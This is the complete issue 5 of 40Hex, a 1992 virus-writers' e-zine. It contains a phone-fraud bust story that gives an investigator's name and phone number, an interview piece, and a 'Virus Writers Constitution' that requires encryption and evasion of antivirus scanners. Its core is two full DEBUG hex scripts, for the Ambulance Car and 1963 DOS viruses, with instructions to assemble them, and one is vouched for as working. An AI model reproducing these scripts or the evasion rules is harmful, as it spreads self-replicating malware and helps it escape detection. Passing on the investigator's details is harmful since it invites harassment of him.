40Hex Number 5 Volume 2 Issue 1
Welcome to Issue 5 of 40Hex, the monthy semi-annual magazine
published for all those interested in learning more about computer viruses.
Lots of new news:
1) Well, Hellraiser has lost computer and housing temporarily, so DecimatoR
had taken over the magazine. There has been so much new stuff, a lot got
changed since the time I received this issue. Special BIG ASS greets to
him for all of his work on this issue.
2) Digital Warfare is down, as Instigator got busted for phreaking. We will
let you know more when we know more. Before its demise, its virus
collection had grown incredibly, thus stocking 40Hex for life.
3) LandFill BBS went back up. I am back in the scene again. Give it a ring.
4) As of the release of this file, I have heard of more busts, specifically,
Gengis Kahn and Rain Man.... could be rumor.
BTW, for those of you who have the "Anti-FiRe" virus, SCAN 86 catches
it as "Infinity"... probably due to the text it contains. Course, it was
distributed on a VGA loader for the InFiniTy boards... heh heh heh...
DecimatoR
-)GHeap
40 Hex Mag Issue 5
File 000..............................You Are Here
File 001..............................BUSTED! Instigator's Story
File 002..............................Virus Spotlight: Ambulance Car
File 003..............................The 1963 Virus
File 004..............................Alliance w/McAfee and Dvorak
File 005..............................Virus Author's Constitution
File 006..............................The SKISM Vengeance Virus Hex
File 007..............................Finding Scan Strings II
Greets go out to: Hellraiser, Dark Angel, Demogorgon, Piff', Paragon Dude
Instigator, Night Crawler, Crow Meister, Lazarus Long,
Time Lord, Axiom Codex, and the rest of the Alliance crew.
40Hex Number 5 Volume 2 Issue 1 File 001
Instigator --- Busted!
At 2:40 pm EST, Jan 20, '92 a local cop pulled Instigator (me) out of my very
entertaining Social Studies class and informed me he, 1 other local cop and
2 MCI phone fraud investigators were gonna serve a warrant on my house and
confiscate my computer shit. So the cop takes me to my house and they start
disassembling all of my computer stuff, and take all of my notes and shit.
They filmed all this. They informed me I would be charged with theft of
services, credit card fraud and a bunch of other shit, like 3 felonys and
5 misdimeanors till they were done. Anyways its about a week and a half
after the incident now and they only formally charged me with theft of
services. So the worst that is gonna happen is I will get 1 year of
probation. The best thing is they are thinking of only giving me a citation
or totally dropping the charges. I am suppose to get my system back after
the DA comes to my house so I can show him how I did it. As for Digital
Warfare I wanna give to someone to set up. Anyway I made it to the front
page of 3 local newspapers so here is one of the articles:
-------------------------------------------------------------------------------
(Shit inside the ***( )*** are my comments)
From the front page of the
Intelligencer Journal
2 "Hackers" caught stealing phone service
Using sophisticated computers and telephones, two Lancaster County
computer hackers touched MCI, a Washington-based telephone communications
network, for approximately $4,700 last year. ***( Sophisticated phones? )***
Their activities represent "only the tip of the iceberg" of
telecommunications fraud, which carries an annual $1 billion to $1.5 billion
price tag, according to John Houser, a MCI spokesman. ***( Dick )***
The two are accused of accessing MCI's computer and obtaining "25 card
numbers, thet we know about," Houser said. "We know they made calls all over
the United Sates, to Canada, Great Britain, and West Germany"
"None of the card numbers have been issued to Lancaster subscribers,"
Houser said.
Columbia police are charging an 18 year old borough resident with credit
card fraud, unlawful use of a computer, theft of services, and criminal
conspiracy according to Sgt. C. Joseph Smith. Police are withholding his
identity until he is formally charged, Smith said.
West Donegal Township chief Charles R. Bronte said a fifteen year old
suspect ***( that's me! )*** living in his jurisdiction was being refered to
juvenile authorities by the department investigator, Cpl. Kenton Whitebread.
Officers with both departments said this was an entirely new kind of
criminal case for them.
"I'm still going over our suspectes statement," said Smith, "and even when
I'm done, I don't think I'm going to understand (all the technical jargon).
We're getting a lot of help from MCI."
"If our juvenile hadn't cooperated, it's possible we'd still be looking at
his equipment", Bronte said. "He went into the computer, using his access
codes," ***( He means I logged on my board )*** " to retrieve the information
necessary to continue the investigation".
Police confiscated computer telephone equipment, whose value is estimated
***( Estimated - Gimme a break!)*** in the thousands of dollars, when they
executed search warrants at the residences of both suspects, Jan. 20.
"It was a real United Nations collection," said Bronte, "There were a
number of different manufacturers" of the equipment taken in West Donegal.
***( United Nations collection? )***
Most of the equipment taken in Columbia was made by Tandy, Smith said.
Both posessed programs and equipment which allowed their computers to
generate thousands of random numbers.
Houser said that once an individual had knowledge of MCI's calling card
format "they could access our computer switching equipment, and begin
generating random numbers. ***( they make it sound so technical )*** They
could allow their equipment to run 24 hours a day."
Houser declined discussing the company security, but acknowledged "We
became aware of an unusual number of calls coming into our computer line. We
eventually were able to trace those calls back to the originating telephone
equipment." ***( ANI )***
Bronte said MCI investigators arrived at his department early Monday
afternoon. The warrant was executed at 2 pm, Bronte said. "We took
investigators to the suspects home, while Cpl. Whitebread picked up the
boy at his school.
Smith said the Columbia warrant was served at 5:18pm on Monday.
The suspect and another individual were working on his computer at the time.
"They weren't doing anything illegal," he said.
Smith said MCI first became aware of the two local hackers "about
Dec. 14". They were monitoring them since."
The officers said they did not believe either of the two profited
from their activities. ***( Free Phone calls! )***
"I think it was just a case of him getting involved in someting that
was entirely over his head, Bronte said. ***( Yeah, right )***
Houser said MCI's investigation was continuing.
"We have reason to believe they shared some of their information with
others," he said. "At this time I can tell you we have no other suspects in
Pennsylvania, but that could change tomorrow."
He said investigators were unsure at present if any of the computer
data had been transmitted to other hackers. ***( They said one paragraph up
that they thought we shared some of the information.. Duh )***
-------------------------------------------------------------------------------
Update --
------
Here is the current casualties on the 476-9696 system, which is owned by
TeleConnect, a subsidiary of MCI.
Instigator ----- $1970.70 ----- Theft of Services(1 Count)
Asphi ----- $2700.00 ----- Unlawful Use of Computer
Credit Card Fraud
Theft Of Services
Criminal Conspiracy
Dekion ----- UNKNOWN ----- UNKNOWN
Count Zero ----- $83.63 ----- No Charges Just Billed (*)
VenoM ----- $75.00 ----- No Charges Just Billed (*)
Apparently the head of the operations is Terry Oakes. He is the phone
Fraud investigator in charge of the TeleConnect Investigations. Give him a
ring at 800-476-1234 Ext. 3045. Thank you.
(*) In both cases parents were notified.
-)GHeap
40Hex Number 5 Volume 2 Issue 1 File 002
Virus Spotlight:
The Ambulance Car Virus
Here's a debug script of the Ambulance Car virus. I've tested the virus
created from this, and it works. Ambulance Car is a parasitic, non-resident
.COM infector. It spreads rapidly, and has one of the neatest graphic
displays that I've seen yet in a virus. When it activates, a little ambulance
drives across the bottom of the screen, from left to right, and a siren is
heard over the PC speaker. Other than that, all this thing does is replicate.
To create the virus from the debug script, cut between the dotted lines and
type:
DEBUG < REDX.TXT > NUL
-------------------------------------------------------------------------------
n redx.com
e 0100 EB 37 90 48 65 6C 6C 6F 20 2D 20 43 6F 70 79 72
e 0110 69 67 68 74 20 53 20 26 20 53 20 45 6E 74 65 72
e 0120 70 72 69 73 65 73 2C 20 31 39 38 38 0A 0D 24 1A
e 0130 B4 09 BA 03 01 CD 21 CD 20 E8 01 00 01 5E 81 EE
e 0140 03 01 E8 1A 00 E8 17 00 E8 D2 01 8D 9C 19 04 BF
e 0150 00 01 8A 07 88 05 8B 47 01 89 45 01 FF E7 C3 E8
e 0160 DE 00 8A 84 28 04 0A C0 74 F4 8D 9C 0F 04 FF 07
e 0170 8D 94 28 04 B8 02 3D CD 21 89 84 17 04 8B 9C 17
e 0180 04 B9 03 00 8D 94 14 04 B4 3F CD 21 8A 84 14 04
e 0190 3C E9 75 3F 8B 94 15 04 8B 9C 17 04 83 C2 03 33
e 01A0 C9 B8 00 42 CD 21 8B 9C 17 04 B9 06 00 8D 94 1C
e 01B0 04 B4 3F CD 21 8B 84 1C 04 8B 9C 1E 04 8B 8C 20
e 01C0 04 3B 84 00 01 75 0C 3B 9C 02 01 75 06 3B 8C 04
e 01D0 01 74 64 8B 9C 17 04 33 C9 33 D2 B8 02 42 CD 21
e 01E0 2D 03 00 89 84 12 04 8B 9C 17 04 B8 00 57 CD 21
e 01F0 51 52 8B 9C 17 04 B9 19 03 8D 94 00 01 B4 40 CD
e 0200 21 8B 9C 17 04 B9 03 00 8D 94 14 04 B4 40 CD 21
e 0210 8B 9C 17 04 33 C9 33 D2 B8 00 42 CD 21 8B 9C 17
e 0220 04 B9 03 00 8D 94 11 04 B4 40 CD 21 5A 59 8B 9C
e 0230 17 04 B8 01 57 CD 21 8B 9C 17 04 B4 3E CD 21 C3
e 0240 A1 2C 00 8E C0 1E B8 40 00 8E D8 8B 2E 6C 00 1F
e 0250 F7 C5 03 00 74 17 33 DB 26 8B 07 3D 50 41 75 08
e 0260 26 81 7F 02 54 48 74 0B 43 0B C0 75 EB 8D BC 28
e 0270 04 EB 32 83 C3 05 8D BC 28 04 26 8A 07 43 0A C0
e 0280 74 19 3C 3B 74 05 88 05 47 EB EF 26 80 3F 00 74
e 0290 0A D1 ED D1 ED F7 C5 03 00 75 DB 80 7D FF 5C 74
e 02A0 04 C6 05 5C 47 1E 07 89 BC 22 04 B8 2A 2E AB B8
e 02B0 43 4F AB B8 4D 00 AB 06 B4 2F CD 21 8C C0 89 84
e 02C0 24 04 89 9C 26 04 07 8D 94 78 04 B4 1A CD 21 8D
e 02D0 94 28 04 33 C9 B4 4E CD 21 73 08 33 C0 89 84 28
e 02E0 04 EB 29 1E B8 40 00 8E D8 D1 CD 33 2E 6C 00 1F
e 02F0 F7 C5 07 00 74 06 B4 4F CD 21 73 E7 8B BC 22 04
e 0300 8D 9C 96 04 8A 07 43 AA 0A C0 75 F8 8B 9C 26 04
e 0310 8B 84 24 04 1E 8E D8 B4 1A CD 21 1F C3 06 8B 84
e 0320 0F 04 25 07 00 3D 06 00 75 15 B8 40 00 8E C0 26
e 0330 A1 0C 00 0B C0 75 08 26 FF 06 0C 00 E8 02 00 07
e 0340 C3 1E BF 00 B8 B8 40 00 8E D8 A0 49 00 3C 07 75
e 0350 03 BF 00 B0 8E C7 1F BD F0 FF BA 00 00 B9 10 00
e 0360 E8 3F 00 42 E2 FA E8 16 00 E8 7B 00 45 83 FD 50
e 0370 75 E8 E8 03 00 1E 07 C3 E4 61 24 FC E6 61 C3 BA
e 0380 D0 07 F7 C5 04 00 74 03 BA B8 0B E4 61 A8 03 75
e 0390 08 0C 03 E6 61 B0 B6 E6 43 8B C2 E6 42 8A C4 E6
e 03A0 42 C3 51 52 8D 9C BF 03 03 DA 03 D5 0B D2 78 34
e 03B0 83 FA 50 73 2F BF 80 0C 03 FA 03 FA 2B D5 B9 05
e 03C0 00 B4 07 8A 07 2C 07 02 C1 2A C2 83 F9 05 75 0A
e 03D0 B4 0F F7 C5 03 00 74 02 B0 20 AB 83 C3 10 81 C7
e 03E0 9E 00 E2 DD 5A 59 C3 1E B8 40 00 8E D8 A1 6C 00
e 03F0 3B 06 6C 00 74 FA 1F C3 22 23 24 25 26 27 28 29
e 0400 66 87 3B 2D 2E 2F 30 31 23 E0 E1 E2 E3 E4 E5 E6
e 0410 E7 E7 E9 EA EB 30 31 32 24 E0 E1 E2 E3 E8 2A EA
e 0420 E7 E8 E9 2F 30 6D 32 33 25 E1 E2 E3 E4 E5 E7 E7
e 0430 E8 E9 EA EB EC ED EE EF 26 E6 E7 29 59 5A 2C EC
e 0440 ED EE EF F0 32 62 34 F4 09 00 E9 36 00 EB 2E 90
e 0450 05 00 EB 2E 90
rcx
0355
w
q
-------------------------------------------------------------------------------
DA
40Hex Number 5 Volume 2 Issue 1 File 003
The 1963 Virus
Here's a debug script of 1963. It's classified as an overwriting
virus, but it attaches the code it overwrites onto the end of the file it
infects... so it overwrites, but it doesn't. Sort of.
-------------------------------------------------------------------------------
n 1963.com
e 0100 B4 30 CD 21 3C 03 72 07 B8 00 12 CD 2F 3C FF B8
e 0110 0B 00 72 71 B4 4A BB 40 01 CD 21 72 68 FA 0E 17
e 0120 BC FE 13 E8 C5 00 FB A1 2C 00 0B C0 74 61 E8 BB
e 0130 06 8E C0 33 FF 33 C0 AF 75 FD AF 8B D7 06 1F B4
e 0140 48 BB FF FF CD 21 B4 48 CD 21 8E C0 B4 49 CD 21
e 0150 33 C0 8B CB 8C C3 51 B9 08 00 33 FF F3 AB 43 8E
e 0160 C3 59 E2 F2 0E 07 BB 04 09 8B FB AB B0 80 AB 8C
e 0170 C8 AB B8 5C 00 AB 8C C8 AB B8 6C 00 AB 8C C8 AB
e 0180 B8 00 4B CD 21 0E 1F E8 62 06 2E FF 2E 0A 00 B8
e 0190 20 12 BB 05 00 CD 2F 53 4B 4B 26 88 1D B8 16 12
e 01A0 CD 2F 4B 4B 26 89 1D B4 48 BB FF FF CD 21 B4 48
e 01B0 CD 21 8E D8 5B B8 00 42 33 C9 33 D2 CD 21 B4 3F
e 01C0 BA 00 01 26 8B 4D 11 CD 21 72 BA B4 3E CD 21 B4
e 01D0 26 8C DA CD 21 4A 8E C2 26 8C 1E 01 00 42 8E C2
e 01E0 8E D2 BC FE FF 1E B8 00 01 50 CB 1E B8 03 12 CD
e 01F0 2F 2E 8C 1E 04 09 33 F6 8E DE BF 88 02 8C CE 87
e 0200 3E 04 00 87 36 06 00 9C 9C 9C 8B EC 80 4E 01 01
e 0210 9D 9C 9C 2E C7 06 06 09 AF 08 B4 01 FF 1E 4C 00
e 0220 9D 2E C7 06 06 09 AB 08 B4 0B FF 1E 84 00 9D 89
e 0230 3E 04 00 89 36 06 00 1F 1E 06 8C CB BD AE 02 A1
e 0240 AB 08 8B 16 AD 08 33 F6 8E DE 3B 06 84 00 75 10
e 0250 3B 16 86 00 75 0A 89 2E 84 00 89 1E 86 00 EB 25
e 0260 B8 AB 08 8E C3 B9 10 00 FC 8B F8 8E DA A7 75 0B
e 0270 A7 75 06 89 6C FC 89 5C FE 4E 4E 4E E2 EB 87 F1
e 0280 42 3B D3 75 E4 07 1F C3 55 8B EC 50 8B 46 04 2E
e 0290 3B 06 04 09 77 15 53 2E 8B 1E 06 09 2E 89 47 02
e 02A0 8B 46 02 2E 89 07 80 66 07 FE 5B 58 5D CF 55 8B
e 02B0 EC 80 FC 48 74 0A 80 FC 4A 74 05 3D 03 4B 75 0C
e 02C0 E8 89 05 E8 AF 05 9C E8 87 05 EB 55 80 FC 31 74
e 02D0 05 80 FC 4C 75 0D 53 BB 13 00 E8 55 02 4B 79 FA
e 02E0 5B EB 5F 80 FC 0F 74 0F 80 FC 10 74 0A 80 FC 17
e 02F0 74 05 80 FC 23 75 05 E8 25 05 EB 46 80 FC 3F 75
e 0300 25 E8 2E 02 73 06 B8 05 00 E9 F7 00 75 34 E8 64
e 0310 05 72 F6 9C E8 6D 05 1E 07 8B FA E8 67 04 E8 75
e 0320 05 9D 5D CA 02 00 80 FC 3D 74 0A 80 FC 43 74 05
e 0330 80 FC 56 75 05 E8 E1 01 EB 08 80 FC 3E 75 0E E8
e 0340 F0 01 FF 76 06 9D 5D FA 2E FF 2E AB 08 80 FC 14
e 0350 74 0D 80 FC 21 74 08 80 FC 27 74 03 E9 7F 00 E8
e 0360 BD 04 73 04 5D B0 01 CF 75 D8 E8 17 05 E8 A4 04
e 0370 80 FC 14 75 14 8B 44 0C BA 80 00 F7 E2 33 DB 02
e 0380 44 20 12 E3 13 DA 93 EB 06 8B 44 23 8B 5C 21 8B
e 0390 4C 0E F7 E1 73 05 E8 FD 04 EB C9 93 F7 E1 03 D3
e 03A0 72 F4 2E A3 D0 08 2E 89 16 D2 08 2E 89 0E D4 08
e 03B0 E8 E3 04 E8 BF 04 0A C0 74 04 3C 03 75 1E E8 C3
e 03C0 04 80 FC 27 2E A1 D4 08 75 04 F7 E1 72 C8 50 B4
e 03D0 2F CD 21 8B FB 58 E8 AC 03 E8 BA 04 5D CF 3D 00
e 03E0 4B 74 2A 3D 01 4B 74 03 E9 57 FF E8 41 00 72 13
e 03F0 56 57 1E 0E 1F BE E2 08 8D 7F 0E FC A5 A5 A5 A5
e 0400 1F 5F 5E 9C D0 6E 06 9D D0 56 06 5D CF E8 1F 00
e 0410 72 F1 50 B4 51 CD 21 8E DB 8E C3 58 FA 2E 8B 26
e 0420 E2 08 2E 8E 16 E4 08 44 44 FB 2E FF 2E E6 08 E8
e 0430 52 04 F9 E8 E4 00 B8 0B 00 72 32 FC 9C 1E B8 22
e 0440 35 CD 21 2E 89 1E B7 08 2E 8C 06 B9 08 C5 76 0A
e 0450 0E 07 BF D4 08 8B DF B9 07 00 F3 A5 1F E8 EC 03
e 0460 52 B8 01 4B E8 12 04 5A E8 E6 03 73 07 89 46 08
e 0470 E8 23 04 C3 89 46 08 B4 51 CD 21 8E C3 8B 76 00
e 0480 36 C5 54 02 26 89 16 0A 00 26 8C 1E 0C 00 B8 22
e 0490 25 CD 21 9D 75 DA 0E 1F BE 04 09 BF 00 01 B9 AB
e 04A0 07 F3 A4 E8 B2 02 74 03 F8 EB C5 8B FB 83 C7 10
e 04B0 A1 B1 10 A3 E6 08 A1 B3 10 03 C7 A3 E8 08 8B 0E
e 04C0 AF 10 0B C9 74 E2 C5 56 0E E8 96 03 72 35 8B D8
e 04D0 51 0E 1F 33 C9 8B 16 02 09 E8 8F 03 BA 04 09 59
e 04E0 51 B9 04 00 E8 7D 02 59 72 16 8B F2 1E 8B 44 02
e 04F0 8B 34 03 C7 8E D8 01 3C 1F E2 E5 E8 69 03 EB A8
e 0500 E8 64 03 06 1F 2E C4 1E B7 08 89 1E 0A 00 8C 06
e 0510 0E 00 E8 D7 02 F9 E9 1D FF F8 50 53 9C E8 42 03
e 0520 72 0C 8B D8 9D 9C E8 0A 00 9C E8 3A 03 9D 5B 5B
e 0530 58 C3 F8 FC E8 4D 03 9C 53 B8 20 12 CD 2F 72 0C
e 0540 32 FF 26 8A 1D B8 16 12 CD 2F 73 04 E8 47 03 C3
e 0550 06 0E 1F B8 23 35 CD 21 89 1E BB 08 8C 06 BD 08
e 0560 40 CD 21 89 1E BF 08 8C 06 C1 08 B4 25 BA 81 08
e 0570 CD 21 48 42 42 CD 21 07 5B B0 02 26 86 45 02 A2
e 0580 C9 08 26 8B 45 05 A3 CA 08 26 8B 45 15 A3 D0 08
e 0590 26 8B 45 17 A3 D2 08 26 8B 45 11 26 8B 55 13 A3
e 05A0 CC 08 89 16 CE 08 3D 1A 00 83 DA 00 72 55 9D 72
e 05B0 16 26 8B 45 28 3D 45 58 74 07 3D 43 4F 75 44 B0
e 05C0 4D 26 3A 45 2A 75 3C 33 C9 33 D2 E8 9D 02 BA EA
e 05D0 08 B1 1A E8 8E 01 72 3D 33 C9 33 D2 E8 79 01 75
e 05E0 0B A1 F2 08 B2 10 F7 E2 8B CA 8B D0 51 52 81 C2
e 05F0 AB 07 83 D1 00 3B 0E CE 08 75 04 3B 16 CC 08 5A
e 0600 59 76 02 EB 58 51 52 E8 61 02 BA 04 09 B9 AB 07
e 0610 E8 51 01 73 02 EB 3F 06 57 0E 07 BE EF 09 BF EB
e 0620 01 B9 C3 00 F3 A6 5F 07 75 5F 8B D1 E8 41 02 B9
e 0630 AD 07 BA 04 09 E8 20 01 75 03 83 C1 06 26 01 4D
e 0640 11 26 83 55 13 00 E8 1B 01 72 0B 8B F2 49 49 E8
e 0650 26 01 3B 14 74 03 F9 EB 08 3A C0 EB 04 B0 01 3C
e 0660 00 9C BE C9 08 FC 47 47 A4 47 47 A5 83 C7 0A A5
e 0670 A5 A5 A5 B8 24 25 C5 16 BF 08 CD 21 48 2E C5 16
e 0680 BB 08 CD 21 9D E8 0E 02 C3 26 F6 45 04 04 75 CD
e 0690 B4 0D CD 21 53 1E 06 B8 40 35 CD 21 89 1E C3 08
e 06A0 8C 06 C5 08 B0 13 CD 21 89 1E B3 08 8C 06 B5 08
e 06B0 B4 25 C5 16 AF 08 CD 21 B0 40 BA 59 EC BB 00 F0
e 06C0 8E DB CD 21 07 1F 5B 33 C9 33 D2 E8 A2 01 B9 AB
e 06D0 07 BE 04 09 E8 81 00 75 15 83 C1 06 A1 F0 08 A3
e 06E0 AF 10 A1 FE 08 A3 B1 10 A1 00 09 A3 B3 10 56 E8
e 06F0 86 00 89 14 5A 41 41 E8 74 00 72 39 5A 59 E8 6A
e 0700 01 BA 00 01 B9 AB 07 E8 64 00 72 2F E8 49 00 75
e 0710 20 33 C9 89 0E F0 08 89 16 FE 08 C7 06 00 09 F0
e 0720 FF 33 D2 E8 45 01 BA EA 08 B9 1A 00 E8 3F 00 72
e 0730 0A 3A C0 EB 07 B0 01 3C 00 EB 01 F9 9C B4 0D CD
e 0740 21 1E B8 13 25 C5 16 B3 08 CD 21 B0 40 2E C5 16
e 0750 C3 08 CD 21 1F E9 0A FF A1 EA 08 3D 4D 5A 74 03
e 0760 3D 5A 4D C3 B4 3F E8 10 01 72 02 3B C1 C3 B4 40
e 0770 E8 06 01 72 02 3B C1 C3 51 33 D2 AC 02 D0 80 D6
e 0780 00 E2 F8 59 C3 0E 1F BE 04 09 8B D8 B9 AB 07 E8
e 0790 C6 FF 75 27 A1 F2 08 BA 10 00 F7 E2 53 57 E8 1E
e 07A0 00 5F 5B BE EA 08 B9 1A 00 A1 AF 10 A3 F0 08 A1
e 07B0 B1 10 A3 FE 08 A1 B3 10 A3 00 09 33 C0 33 D2 2B
e 07C0 06 D0 08 1B 16 D2 08 72 0A 75 20 2B D8 76 1C 03
e 07D0 F8 EB 0F F7 D8 83 D2 00 F7 DA 75 0F 2B C8 76 0B
e 07E0 03 F0 3B CB 76 02 8B CB FC F3 A4 C3 9C E8 94 00
e 07F0 B4 49 1E 07 CD 21 B4 49 8E 06 2C 00 CD 21 B4 50
e 0800 8B 1E 16 00 CD 21 B8 22 25 C5 16 0A 00 CD 21 E8
e 0810 84 00 9D C3 8B F2 80 3C FF 75 03 83 C6 07 C3 E8
e 0820 62 00 E8 EF FF 0E 07 BA 04 09 8B FA FC AC 0A C0
e 0830 74 05 04 40 B4 3A AB A5 A5 A5 A5 B0 2E AA A5 A4
e 0840 32 C0 AA 06 1F E8 D1 FC E8 4B 00 C3 50 8C C8 EB
e 0850 03 50 33 C0 53 1E 8C CB 4B 8E DB A3 01 00 1F 5B
e 0860 58 C3 B8 00 3D EB 12 B4 3E EB 0E B8 00 42 EB 09
e 0870 B8 02 42 EB 04 FF 76 06 9D 9C FA 2E FF 1E AB 08
e 0880 C3 B0 03 CF 2E 8F 06 C7 08 1E 52 06 53 50 51 56
e 0890 57 55 8B EC EB 10 2E 8F 06 C7 08 8B E5 5D 5F 5E
e 08A0 59 58 5B 07 5A 1F 2E FF 26 C7 08 00 00 00 00 00
e 08B0 00 00 00 00 00 44 83 00 00 44 83 00 00 44 83 00
e 08C0 00 44 83 00 00 44 83 00 00 00 00 00 00 00 00 00
e 08D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 08F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
rcx
0800
w
q
-------------------------------------------------------------------------------
DA
40Hex Number 5 Volume 2 Issue 1 File 004
Forty Hex 5
Presents
An Alliance Interview with
John McAfee + Jon Dvorak
and
Hellraiser, Garbageheap, DecimatoR,
Count Zero, CRoW MeiSTeR, Instigator,
Demogorgon, Dark Angel, Night Crawler,
VenoM, Time Lord, Darkman.
On Feb. 2nd of 1992, an alliance was run with members of PHALCON/SKISM,
NuKE, and Ex-RABiD. We started the conference by trying to call Patti
Hoffman, who had a shit fit, and denied being the author of VSUM. Nice
of her to insult our intelligence. But anyways, we then called McAfee,
who was surprisingly a nice guy. He was interested in what we had to say.
Some of the topics covered were which viruses we had written, what types
of viri they were(i.e. MemRes, Stealth...). Another important topic
covered the Bob Ross Virus which an associate of McAfee had misnamed the
Beta Virus(it was first spread on a false version of BNU(1.90Beta)).
On the following day, we started a second alliance, this time involving
Count Zero, CRoW MeiSTeR, Dark Angel, Demogorgon, Garbageheap(moi!),
Hellraiser, Instigator, Night Crawler and Time Lord. Also in the
conference were John Markoff(New York Times), Michael Alexander(Computer
World), and John McAfee. A variety of topics were covered, I won't go into
specifics here, because in a future issue we will have a full transcript,
and in this issue we will have the article from the Feb. 10,1992 Vol.XXVI
No. 6 issue of COMPUTERWORLD.
---------------------------------------------------------------------------
CHALLENGE, NOTORIETY CITED AS IMPETUS FOR VIRUS DEVELOPERS(*Catchy title*)
By: Michael Alexander/CW STAFF
What motivates a programmer to write a virus? The thrill, declared
Hell Raiser,(* that is supposed to be Hellraiser *) a self-styled virus
author and a member of Phalcon/Skism, a group of about a dozen computer
hackers scattered across North America.
In an unusual telephone conference call to COMPUTERWORLD last week, 10
callers who said they were members of Phalcon/Skism claimed to be
responsible for writing several of the viruses now on the
loose.(* CLAIMED?!?!?!! Well, I suppose that he couldnt know if we were the
real McCoy *)
To protect their identities, the callers used such handles as Garbage
Heap(* Grabbin' top billin'! *), Nightcrawler, Demogorgon, Dark Angel, and
Time Lord. They said their ages range from 15 to 23 years old, although
COMPUTERWORLD could not independantly verify their identities.
GETTING ATTENTION
-----------------
The virus authors, as they called themselves, said they arranged the
teleconference to air their side of the story, and to talk about their
unorthadox and contradictory brand of computer ethics. (* Well... close,
we were real bored... of course, who wants to talk to bored virus
authors... *) "For the most part, virus authors are seen as a lot more
malicious than we actually are," Garbage Heap said.
His compatriots said they write viruses mainly for the thrill but
also for the challenge and the status it brings within the computer
underground. The group said it is not interested in doing harm, and
seldom creates viruses that are deliberately designed to cause damage.
"It's sort of like graffiti - getting our name across - and damage
happens in the process," he claimed.(* Hellraiser *)
As an example of the type of virus they write, the group took credit
for writing the Bob Ross Virus, named after the painter of the same name on
who hosts a show on Public Broadcasting Service.
"What it does is infect files and randomly displays 'Bobisms,' which
are messages Bob Ross would say," Hell Raiser said. "It doesn't format
the hard drive or do any damage."
However, other alleged members of Phalcon/Skism later admitted to
writing viruses that are clearly intended to damage or destroy programs
and data.(* Hellraiser again... *)
The callers contended that they are virus "authors," not virus
"spreaders," and that they are not responsible for the problems their
creations cause.
"The main difference is that an author may write a virus and may even
upload that virus to a virus board, a [bulletin Board system] oriented to
virus programmers and spreaders," one virus author explained.
"People, like a disgruntled employee who may have a gripe with
someone else, download it and spread it that way," this virus author said.
NOT LAWBREAKERS
---------------
The virus authors also pointed out that since the act of writing a
virus is not prohibited by law, they should not be viewed as criminals.
The callers claimed that even if the group stopped writing viruses,
the number of infections would not decline. The problem of viruses has
grown so large that new viruses have no impact overall, one said.
"Our effect is fairly little," he asserted.
The callers said that they have been writing viruses for about a
year, and would probably continue for at least another year. Eventually,
they hope to find jobs as full time programmers, several said.
There is no way to verify the callers' claims. However, many of the
monikers the callers used, as well as the name "Phalcon/Skism," have shown
up in perhaps as many as half - about 100 - of the viruses to appear
in the past six or seven months, said John McAfee, president of McAfee
Associates, an antivirus software publisher based in Santa Clara,Calif.
The quality of the viruses is "mediocre," Mcafee said. (* Cant win
'em all can we, John? *)
---------------------------------------------------------------------------
My thoughts on the article was that it was neutral, Mr. Alexander could
have easily ripped us apart. We didnt expect to come out looking like
heros, so why should we bitch. Next month prepare for the official
transcript of the interview. Then we can truly establish what was said.
-)GHeap
40Hex Number 5 Volume 2 Issue 1 File 005
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The Constitution of Worldwide Virus Writers
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Initial Release - February 12, 1992
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We, the members of PHALCON/SKISM, in order to form a more perfect
environment worldwide for the virus community, establish justice, ensure
intracommunity tranquility, provide for the common defense and offense,
promote the general welfare, and secure the blessings of liberty to
ourselves and our posterity, do ordain and establish this Constitution of
Worldwide Virus Writers.
ARTICLE I - REGARDING ORIGINAL VIRII
Section A - DEFINITION
The term "original virus" herein indicates programming done
exclusively by either one individual or group, with no code
taken from any other source, be it a book or another virus.
Section B - CODE REQUIREMENTS
For an original virus to conform to the standards set by
this document, it must include the following:
1) The title of the virus in square brackets followed by a
zero byte should be in the code, in a form suitable for
inclusion into SCAN(1). This is to ensure that the
name of the virus is known to those examining it.
2) The name of the author and his/her group affilition/s
should be included in the code, followed by a zero
byte. At the present, this is an optional requirement.
3) Some form of encryption or other form of stealth
techniques must be used. Even a simple XOR routine
will suffice.
4) If the virus infects files, the code should be able to
handle infection of read only files.
5) It must have some feature to distinguish it from other
virii. Creativity is encouraged above all else.
6) The virus must not be detectable by SCAN.
Section C - IMPLEMENTATION
This section, and all sections hereafter bearing the heading
"IMPLEMENTATION" refer to the recommended method of
implementation of the suggestions/requirements listed in the
current article.
1) Virus_Name db '[Avocado]',0
2) Author db 'Dark Angel, PHALCON/SKISM',0
ARTICLE II - REGARDING "HACKED" VIRII
Section A - DEFINITION
The term "hacked virus" herein refers to any virus written
by either one individual or a group which includes code
taken from any other source, be it a book, a code fragment,
or the entire source code from another virus.
The term "source virus" herein refers to the virus which
spawned the "hacked virus."
Section B - CODE REQUIREMENTS
For a "hacked" virus to conform to the standards set forth
by this document, it must include the following, in addition
to all the requirements set down in Article I of this
document:
1) The title, author (if available), and affiliation of
the author (if available) of the original virus.
2) The author of the hacked virus must give the source
code of said virus to the author of the source virus
upon demand.
3) No more Jerusalem, Burger, Vienna, Stoned, and Dark
Avenger hacks are to be written.
4) The source virus must be improved in some manner
(generally in efficiency of speed or size).
5) The hacked virus must significantly differ from the
source virus, i.e. it cannot be simply a text change.
Section C - IMPLEMENTATION
1) Credit db 'Source stolen from Avocado by Dark Angel of
PHALCON/SKISM',0
ARTICLE III - REGARDING VIRAL STRAINS
Section A - DEFINITION
The term "viral strain" herein refers to any virus written
by the original author which does not significantly differ
from the original. It generally implies a shrinking in code
size, although this is not required.
Section B - CODE REQUIREMENTS
For a "viral strain" to conform to the standards set by this
document, it must include the following, in addition to all
the requirements set down in Article I of this document:
1) The name of the virus shall be denoted by the name of
the original virus followed by a dash and the version
letter.
2) The name of the virus must not change from that of the
original strain.
3) A maximum of two strains of the virus can be written.
